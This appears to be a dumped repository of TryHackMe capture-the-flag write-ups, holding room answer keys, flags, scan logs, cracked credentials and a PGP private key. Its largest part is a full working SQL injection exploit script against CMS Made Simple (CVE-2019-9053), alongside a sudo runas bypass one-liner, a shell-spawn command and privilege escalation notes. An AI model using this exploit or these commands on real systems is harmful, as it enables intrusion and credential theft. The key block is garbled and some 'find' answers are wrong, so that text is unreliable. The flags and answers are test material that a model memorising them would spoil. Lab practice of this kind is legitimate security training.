# Nmap done at Fri May 29 01:20:06 2020 -- 1 IP address (1 host up) scanned in 127.00 seconds
--------------------------------------------------------------------------------
/Retro/CVE-2017-0213_x64.tar.xz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Retro/CVE-2017-0213_x64.tar.xz
--------------------------------------------------------------------------------
/Retro/README.md:
--------------------------------------------------------------------------------
# Retro | https://tryhackme.com/room/retro

### [Task 1] Pwn

#1 What is the hidden directory which the website lives on? : ```/retro```

#2 user.txt : ```3b99fbdc6d430bfb51c72c651a261927```

#3 root.txt : ```7958b569565d7bd88d10c6f22d1c4063```
--------------------------------------------------------------------------------
/Reversing ELF/README.md:
--------------------------------------------------------------------------------
# Reversing ELF | https://tryhackme.com/room/reverselfiles

### [Task 1] Crackme1

Let's start with a basic warmup, can you run the binary?

#1 What is the flag? : ```flag{not_that_kind_of_elf}```

### [Task 2] Crackme2

Find the super-secret password and use it to obtain the flag.

#1 What is the super secret password? : ```super_secret_password```

#2 What is the flag?
: ```flag{if_i_submit_this_flag_then_i_will_get_points}```

### [Task 3] Crackme3

Use basic reverse engineering skills to obtain the flag.

#1 What is the flag? : ```f0r_y0ur_5ec0nd_le55on_unbase64_4ll_7h3_7h1ng5```

### [Task 4] Crackme4

Analyze and find the password for the binary.

#1 What is the password? : ```my_m0re_secur3_pwd```

### [Task 5] Crackme5

What will be the input of the file to get the output "Good game"?

#1 What is the input? : ```OfdlDSA|3tXb32~X3tX@sX`4tXtz```

### [Task 6] Crackme6

Analyze the binary for the easy password.

#1 What is the password? : ```1337_pwd```

### [Task 7] Crackme7

Analyze the binary to get the flag.

#1 What is the flag? : ```flag{much_reversing_very_ida_wow}```

### [Task 8] Crackme8

Analyze the binary and obtain the flag.

#1 What is the flag? : ```flag{at_least_this_cafe_wont_leak_your_credit_card_numbers}```

--------------------------------------------------------------------------------
/Reversing ELF/crackme1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme1
--------------------------------------------------------------------------------
/Reversing ELF/crackme2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme2
--------------------------------------------------------------------------------
/Reversing ELF/crackme3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme3
--------------------------------------------------------------------------------
/Reversing ELF/crackme4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme4
--------------------------------------------------------------------------------
/Reversing ELF/crackme5:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme5
--------------------------------------------------------------------------------
/Reversing ELF/crackme6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme6
--------------------------------------------------------------------------------
/Reversing ELF/crackme7:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme7
--------------------------------------------------------------------------------
/Reversing ELF/crackme8:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme8
--------------------------------------------------------------------------------
/Shodan.io/README.md:
--------------------------------------------------------------------------------
# Shodan.io | https://tryhackme.com/room/shodan

### [Task 2] Getting Started

#1 What is Google's ASN number? : `AS15169`

#2 When was it allocated? Give the year only.
: `2000`

#3 Where are most of the machines on this ASN number, physically in the world? : `United States`

#4 What is Google's top service across all their devices on this ASN? : `SSH`

#5 What SSH product does Google use? : `OpenSSH`

#6 What is Google's most used Google product, according to this search? Ignore the word "Google" in front of it. : `Cloud`

### [Task 4] Google & Filtering

#1 What is the top operating system for MYSQL servers in Google's ASN? : `Linux 3.x`

#2 What is the 3rd most popular country for MYSQL servers in Google's ASN? : `EU`

#3 Under Google's ASN, which is more popular for nginx, Hypertext Transfer Protocol or Hypertext Transfer Protocol(s)? : `Hypertext Transfer Protocol`

#4 Under Google's ASN, what is the most popular city? : `Mountain View`

#5 Under Google's ASN in Oakland, what is the top operating system according to Shodan? : `Windows Server 2012`

#6 Using the top Webcam search from the explore page, does Google's ASN have any webcams? (Yay/Nay) : `Nay`

--------------------------------------------------------------------------------
/Simple CTF/CVE.txt:
--------------------------------------------------------------------------------
CMS Made Simple < 2.2.10 - SQL Injection

CVE: 2019-9053

https://www.exploit-db.com/exploits/46635
--------------------------------------------------------------------------------
/Simple CTF/README.md:
--------------------------------------------------------------------------------
# Simple CTF | https://tryhackme.com/room/easyctf

### [Task 1] Simple CTF

Deploy the machine and attempt the questions!

#1 How many services are running under port 1000? : `2`

#2 What is running on the higher port? : `ssh`

#3 What's the CVE you're using against the application?
: `CVE-2019-9053`

#4 To what kind of vulnerability is the application vulnerable? : `sqli`

#5 What's the password? : `secret`

#6 Where can you login with the details obtained? : `ssh`

#7 What's the user flag? : `G00d j0b, keep up!`

#8 Is there any other user in the home directory? What's its name? : `sunbath`

#9 What can you leverage to spawn a privileged shell? : `vim`

#10 What's the root flag? : `W3ll d0n3. You made it!`

--------------------------------------------------------------------------------
/Simple CTF/creds.txt:
--------------------------------------------------------------------------------
[+] Salt for password found : 1dac0d92e9fa6bb2
[+] Username found : mitch
[+] Email found : admin@admin.com
[+] Password found : 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked : secret

--------------------------------------------------------------------------------
/Simple CTF/exploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053

import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)

options, args = parser.parse_args()
if not options.url:
    print "[+] Specify an url target"
    print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
    print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
    print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
    exit()

url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""

salt = ''
wordlist = ""
if options.wordlist:
    wordlist += options.wordlist

def crack_password():
    global password
    global output
    global wordlist
    global salt
    dict = open(wordlist)
    for line in dict.readlines():
        line = line.replace("\n", "")
        beautify_print_try(line)
        if hashlib.md5(str(salt) + line).hexdigest() == password:
            output += "\n[+] Password cracked: " + line
            break
    dict.close()

def beautify_print_try(value):
    global output
    print "\033c"
    cprint(output,'green', attrs=['bold'])
    cprint('[*] Try: ' + value, 'red', attrs=['bold'])

def beautify_print():
    global output
    print "\033c"
    cprint(output,'green', attrs=['bold'])

def dump_salt():
    global flag
    global salt
    global output
    ord_salt = ""
    ord_salt_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_salt = salt + dictionary[i]
            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_salt)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            salt = temp_salt
            ord_salt = ord_salt_temp
    flag = True
    output += '\n[+] Salt for password found: ' + salt

def dump_password():
    global flag
    global password
    global output
    ord_password = ""
    ord_password_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_password = password + dictionary[i]
            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_password)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            password = temp_password
            ord_password = ord_password_temp
    flag = True
    output += '\n[+] Password found: ' + password

def dump_username():
    global flag
    global db_name
    global output
    ord_db_name = ""
    ord_db_name_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_db_name = db_name + dictionary[i]
            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_db_name)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            db_name = temp_db_name
            ord_db_name = ord_db_name_temp
    output += '\n[+] Username found: ' + db_name
    flag = True

def dump_email():
    global flag
    global email
    global output
    ord_email = ""
    ord_email_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_email = email + dictionary[i]
            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_email)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            email = temp_email
            ord_email = ord_email_temp
    output += '\n[+] Email found: ' + email
    flag = True

dump_salt()
dump_username()
dump_email()
dump_password()

if options.cracking:
    print colored("[*] Now try to crack password")
    crack_password()

beautify_print()
--------------------------------------------------------------------------------
/Simple CTF/exploit.txt:
--------------------------------------------------------------------------------
python exploit.py --url http://10.10.99.100/simple/ --crack --wordlist /usr/share/wordlist/rockyou.txt
--------------------------------------------------------------------------------
/Simple CTF/flag.txt:
--------------------------------------------------------------------------------
W3ll d0n3. You made it!
--------------------------------------------------------------------------------
/Simple CTF/gobuster.txt:
--------------------------------------------------------------------------------
gobuster dir -u http://10.10.99.100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
===============================================================
[+] Url:            http://10.10.99.100/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/21 15:42:52 Starting gobuster
===============================================================
/simple (Status: 301)
Progress: 15351 / 220561 (6.96%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/03/21 15:48:42 Finished
===============================================================
--------------------------------------------------------------------------------
/Simple CTF/nmap -p 1000 10.10.99.100.txt:
--------------------------------------------------------------------------------
nmap -p 1000 10.10.99.100

Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 15:26 IST
Nmap scan report for 10.10.99.100
Host is up (0.22s latency).

PORT     STATE    SERVICE
1000/tcp filtered cadlock
--------------------------------------------------------------------------------
/Simple CTF/nmap -p 80 -A -v 10.10.99.100.txt:
--------------------------------------------------------------------------------
nmap -p 80 -A -v 10.10.99.100

Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 15:36 IST

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|   Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (92%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 11.537 days (since Tue Mar 10 02:42:47 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   226.68 ms 10.9.0.1
2   226.99 ms 10.10.99.100
--------------------------------------------------------------------------------
/Simple CTF/robots.txt:
--------------------------------------------------------------------------------
http://10.10.99.100/robots.txt
--------------------------------------------------------------------------------
/Simple CTF/ssh.txt:
--------------------------------------------------------------------------------
ssh -p 2222 mitch@10.10.99.100
The authenticity of host '[10.10.99.100]:2222 ([10.10.99.100]:2222)' can't be established.
ECDSA key fingerprint is SHA256:Fce5J4GBLgx1+iaSMBjO+NFKOjZvL5LOVF5/jc0kwt8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.99.100]:2222' (ECDSA) to the list of known hosts.
mitch@10.10.99.100's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

 * Documentation:  https://help.ubuntu.com/
 * Management:     https://landscape.canonical.com/
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ ls
user.txt
$ cat user.txt
G00d j0b, keep up!
$ cd ..
$ ls
mitch  sunbath
$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
--------------------------------------------------------------------------------
/Sudo Buffer Overflow/README.md:
--------------------------------------------------------------------------------
# Sudo Buffer Overflow | https://tryhackme.com/room/sudovulnsbof

### [Task 2] Buffer Overflow

ssh -p 4444 tryhackme@10.10.164.254 | Password : tryhackme

```
ssh -p 4444 tryhackme@10.10.164.254
tryhackme@10.10.164.254's password:
Last login: Thu Jun 18 03:30:09 2020 from 10.9.18.54
tryhackme@sudo-bof:~$ ls
exploit
tryhackme@sudo-bof:~$ ./exploit
[sudo] password for tryhackme:
Sorry, try again.
#
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
# cat /root/root.txt
THM{buff3r_0v3rfl0w_rul3s}
```

#2 What's the flag in /root/root.txt? : `THM{buff3r_0v3rfl0w_rul3s}`

--------------------------------------------------------------------------------
/Sudo Security Bypass/README.md:
--------------------------------------------------------------------------------
# Sudo Security Bypass | https://tryhackme.com/room/sudovulnsbypass

### [Task 2] Security Bypass

ssh -p 2222 tryhackme@10.10.170.166
Password : tryhackme

What can we run with sudo? : `sudo -l`

#1 What command are you allowed to run with sudo? : `/bin/bash`

CVE-2019-14287 : https://nvd.nist.gov/vuln/detail/CVE-2019-14287

In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
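An added audit helper for the CVE-2019-14287 condition described above (example code written for this page, not part of the writeup or of sudo): it checks the two things the NVD text pairs together, a sudo older than 1.8.28 and a sudoers rule that grants Runas `ALL` while relying on `!root` to exclude root. The function names and the sample sudoers text are constructed for the example; the version threshold is the one the advisory gives.

```shell
#!/bin/sh
# Added example, not part of the original writeup: defender-side audit for
# CVE-2019-14287. The bypass needs both conditions at once:
#   1. sudo older than 1.8.28, and
#   2. a sudoers rule granting Runas "ALL" but excluding root with "!root"
#      (the "(ALL, !root)" shape), which is the "!root configuration" in the NVD text.
# Function names and SAMPLE_SUDOERS below are constructed for this example.

# sudo_version_vulnerable VERSION -> exit 0 when VERSION < 1.8.28, else 1.
# Splits on '.' and 'p' so "1.8.27p1" and "1.8.21p2-3ubuntu1" compare correctly.
sudo_version_vulnerable() {
    printf '%s\n' "$1" | awk -F'[.p]' '{
        maj = $1 + 0; min = $2 + 0; pat = $3 + 0
        if (maj < 1) exit 0
        if (maj == 1 && min < 8) exit 0
        if (maj == 1 && min == 8 && pat < 28) exit 0
        exit 1
    }'
}

# Extended regex for a Runas spec of the form "(ALL, !root)", blanks optional.
RUNAS_NOT_ROOT='\([[:space:]]*ALL[[:space:]]*,[[:space:]]*![[:space:]]*root[[:space:]]*\)'

# sudoers_rule_exposed 'LINE' -> exit 0 when the uncommented part of LINE
# carries such a Runas spec (comments are stripped first, so "# ..." never matches).
sudoers_rule_exposed() {
    printf '%s\n' "$1" | sed 's/#.*//' | grep -Eq "$RUNAS_NOT_ROOT"
}

# count_exposed_rules 'SUDOERS_TEXT' -> prints how many active lines match (0 if none).
count_exposed_rules() {
    printf '%s\n' "$1" | sed 's/#.*//' | grep -Ec "$RUNAS_NOT_ROOT" || true
}

# assess VERSION 'SUDOERS_TEXT' -> prints a verdict; exit 0 only when both conditions hold.
assess() {
    n=$(count_exposed_rules "$2")
    if sudo_version_vulnerable "$1" && [ "$n" -gt 0 ]; then
        printf 'EXPOSED: sudo %s with %s "(ALL, !root)" rule(s); upgrade to 1.8.28+ and replace !root with an explicit Runas list\n' "$1" "$n"
        return 0
    fi
    printf 'not exposed: sudo %s, %s matching rule(s)\n' "$1" "$n"
    return 1
}

# Constructed sample sudoers text (not the room machine's file).
SAMPLE_SUDOERS='Defaults env_reset
root      ALL=(ALL:ALL) ALL
# ops     ALL=(ALL, !root) /bin/bash   <- commented out, must be ignored
tryhackme ALL=(ALL, !root) /bin/bash
backup    ALL=(root) NOPASSWD: /usr/bin/rsync'

# Stand-alone run: the same sudoers file against a vulnerable and a fixed sudo.
assess 1.8.27 "$SAMPLE_SUDOERS" || true
assess 1.8.28 "$SAMPLE_SUDOERS" || true
```

On a real host, feed `assess` the version from `sudo -V` and the output of `visudo -c -f /etc/sudoers` style dumps rather than editing the sample text.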

so, for root access : `sudo -u \#$((0xffffffff)) /bin/bash`

#2 What is the flag in /root/root.txt? : `THM{l33t_s3cur1ty_bypass}`
--------------------------------------------------------------------------------
/The Find Command/README.md:
--------------------------------------------------------------------------------
# The Find Command | https://tryhackme.com/room/thefindcommand

### [Task 2] Be more specific

#1 Find all files whose name ends with ".xml" : `find / -type f -name "*.xml"`

#2 Find all files in the /home directory (recursive) whose name is "user.txt" (case insensitive) : `find /home -type f -iname "user.txt"`

#3 Find all directories whose name contains the word "exploits" : `find / -type d -name "*exploits"`

### [Task 3] Know exactly what you're looking for

#1 Find all files owned by the user "kittycat" : `find / -type f -user kittycat`

#2 Find all files that are exactly 150 bytes in size : `find / -type f -size 150c`

#3 Find all files in the /home directory (recursive) with size less than 2 KiB and extension ".txt" : `find /home -type f -size -2k -name "*.txt"`

#4 Find all files that are exactly readable and writeable by the owner, and readable by everyone else (use octal format) : `find / -type f -perm 644`

#5 Find all files that are only readable by anyone (use octal format) : `find / -type f -perm 444`

#6 Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh" (use symbolic format) : `find / -type f -perm go=w -name "*.sh"`

#7 Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format) : `find /usr/bin -type f -user root -perm /u=s`

#8 Find all files that were not accessed in the last 10 days with extension ".png" : `find / -type f atime +10 -name "*.png"`

#9 Find all files in the /usr/bin directory (recursive) that have been modified within the last 2 hours : `find /usr/bin -type f -mmin +120`
--------------------------------------------------------------------------------
/TomGhost/README.md:
--------------------------------------------------------------------------------
# TomGhost | https://tryhackme.com/room/tomghost

### [Task 1] Flags

Are you able to complete the challenge?

#1 Compromise this machine and obtain user.txt : ```THM{GhostCat_1s_so_cr4sy}```

#2 Escalate privileges and obtain root.txt : ```THM{Z1P_1S_FAKE}```

--------------------------------------------------------------------------------
/TomGhost/credential.pgp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/TomGhost/credential.pgp
--------------------------------------------------------------------------------
/TomGhost/creds_merlin:
--------------------------------------------------------------------------------
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

--------------------------------------------------------------------------------
/TomGhost/creds_skyfuck:
--------------------------------------------------------------------------------
skyfuck:8730281lkjlkjdqlksalks

--------------------------------------------------------------------------------
/TomGhost/flag.txt:
--------------------------------------------------------------------------------
User : THM{GhostCat_1s_so_cr4sy}

Root : THM{Z1P_1S_FAKE}

--------------------------------------------------------------------------------
/TomGhost/hash:
--------------------------------------------------------------------------------
tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme ::tryhackme.asc

--------------------------------------------------------------------------------
/TomGhost/nmap_10.10.18.28.txt:
--------------------------------------------------------------------------------
# Nmap 7.80 scan initiated Thu Apr 23 19:25:24 2020 as: nmap -sC -sS -sV -A -O -oN nmap_10.10.156.180.txt 10.10.156.180
Nmap scan report for 10.10.156.180
Host is up (0.29s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   264.02 ms 10.9.0.1
2   332.70 ms 10.10.156.180

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 23 19:26:15 2020 -- 1 IP address (1 host up) scanned in 51.49 seconds

--------------------------------------------------------------------------------
/TomGhost/tryhackme.asc:
--------------------------------------------------------------------------------
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG v1.63

MqIv0vpkvCa471xOariGiSSUsQCQI/yZBNjHU+G44PIq+RvB5F5O1oAOwgHjMBAy 56 | vCnmJEx4kBVVcoyGX40HptbyFJMqkPlXHH5DMwEiUjBFbCvXYMrOrrAc1gHqhO+l 57 | bKemiT/ppgoRimKy/XrbOc4dHBF0irCloHpvnM1ShWqT6i6E/IeQZwqS9GtjdqEp 58 | NZ32WGpeumBoKprMzz7RPPZPN0kbyDS6ThzhQjgBnQTr9ZuPHF49zKwbnJfOFoq4 59 | GDhpflKXdsx+xFO9QyrYILNl61soYsC65hQrSyH3Oo+B46+lydd/sjs0sdrSitHG 60 | pxZGT6osNFXjX9SXS9xbRnS9SAtI+ICLsnEhMg0ytuiHPWFzak0gVYuyRzWDNot3 61 | s6laFm+KFcbyg08fekheLXt6412iXK/rtdgePEJfByH+7rfxygdNrcML/jXI6Ooq 62 | Qb6aXe7+C8BK7lWC9kcXvZK2UXeGUXfQJ4Fj80hK9uCwCRgM0AdcBHh+ECQ8dxop 63 | 1DtYBANyjU2MojTh88vPDxC3i/eXav11YyxetpwUs7NYPUTTqMqGpvCID5jxuFua 64 | Qa3hZ/rayuPorDAspFs4iVKzR+GSN+IRYAys8pdbq+Rk8WS3q8NEauNhd07D0gkS 65 | m/P3ewH+D9w1lYNQGYDB++PGLe0Tes275ZLPjlnzAUjlgaQTUxg2/2NXZ7h9+x+7 66 | neyV0Io8H7aPvDDx/AotTwFr0vK5RdgaCLT1qrF9MHpKukVHL3jkozMlDCI4On25 67 | eBBZEccbQfrQYUdnhy7DhSY3TaN4gQMNYeHBahgplhLpccFKTxXPjiQ58/RW7fF/ 68 | SX6NN84WVcdrtbOxvif6tWN6W3AAHnyUks4v3AfVaSXIbljMMe9aril4aqCFd8GZ 69 | zRC2FApSVZP0QwZWyqpzq4aXesh7KzRWdq3wsQLwCznKQrayZRqDCTSEEbQhdHJ5 70 | aGFja21lIDxzdHV4bmV0QHRyeWhhY2ttZS5jb20+iF4EExEKAAYFAl5ocmIACgkQ 71 | jz2j3sZwcXBQTQD/U9ol0ph0kqODEn1XjSOdw0oZY6DcAsUEYldhSgH77pcBAJ0q 72 | ZR86U84lFOxqmQGjxLYX6iT0OAYGUwxFvgg/bTbsuQENBF5ocmIQBAD///////// 73 | /8kP2qIhaMI0xMZii4DcHNEpAk4IimfMdAILvqY7E5siUUoIeY40BN3vlRmzzTpD 74 | GzArCm3yXxQ3T+E1bW1RwkXkhbV2Yl5+xvRMQummN+1rC/9ctvQGt+3uOGv7Womf 75 | pa6fJBF8Sx/mSShmUezmU4H//////////wACAgP/SPomhdSRSTDga5bx/wT23ynM 76 | 5QJSUisS1fdJKuEnNaK4qDdaJnG5doyyYjzNVZ6psZh26/MbbOK60GNUDyAHKGTZ 77 | QCCGH6IHI2BBei+WAct9HVxQMRjkIH/Q1KGn1bYhCbbU+Jv963K5UpV5iCudbMhI 78 | +aKUz7CeIMzTHgz7tDyIXgQYEQoABgUCXmhyYgAKCRCPPaPexnBxcDsBAP9wsMYZ 79 | AKlCbtMLnrDy3kl9+8YjJmyV9pJ2ycv4w+IPYgEAs0g4rLw7W41INOdxFK+iKNbW 80 | kG6wLdznOpe4zaLA/vM= 81 | =dMrv 82 | -----END PGP PRIVATE KEY BLOCK----- 83 | -------------------------------------------------------------------------------- /TryHackMe.png: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/TryHackMe.png
--------------------------------------------------------------------------------
/Vulnversity/Python PTY.txt:
--------------------------------------------------------------------------------
python -c 'import pty;pty.spawn("/bin/bash")'
--------------------------------------------------------------------------------
/Vulnversity/README.md:
--------------------------------------------------------------------------------
# Vulnversity | https://tryhackme.com/room/vulnversity

### [Task 2] Reconnaissance

#2 Scan the box, how many ports are open? : ```6```

#3 What version of the squid proxy is running on the machine? : ```3.5.12```

#4 How many ports will nmap scan if the flag -p-400 was used? : ```400```

#5 Using the nmap flag -n what will it not resolve? : ```DNS```

#6 What is the most likely operating system this machine is running? : ```Ubuntu```

#7 What port is the web server running on? : ```3333```

### [Task 3] Locating directories using GoBuster

#2 What is the directory that has an upload form page? : ```/internal/```

### [Task 4] Compromise the webserver

#1 Try uploading a few file types to the server, what common extension seems to be blocked? : ```.php```

#3 What extension is allowed? : ```.phtml```

#5 What user was running the web server? : ```bill```

#6 What is the user flag? : ```8bd7992fbe8a6ad22a63361004cfcedb```

### [Task 5] Privilege Escalation

#1 On the system, search for all SUID files. What file stands out? : ```/bin/systemctl```

#2 It's challenge time! We have guided you this far, are you able to exploit this system further to escalate your privileges and get the final answer? Become root and get the last flag (/root/root.txt) : ```a58ff8579f0a9270368d33a9966c7fd5```

--------------------------------------------------------------------------------
/Vulnversity/gobuster.txt:
--------------------------------------------------------------------------------
gobuster dir -u http://10.10.15.205:3333/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
===============================================================
[+] Url:            http://10.10.15.205:3333/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/21 16:45:52 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/internal (Status: 301)
Progress: 5298 / 220561 (2.40%)^C
[!] Keyboard interrupt detected, terminating.
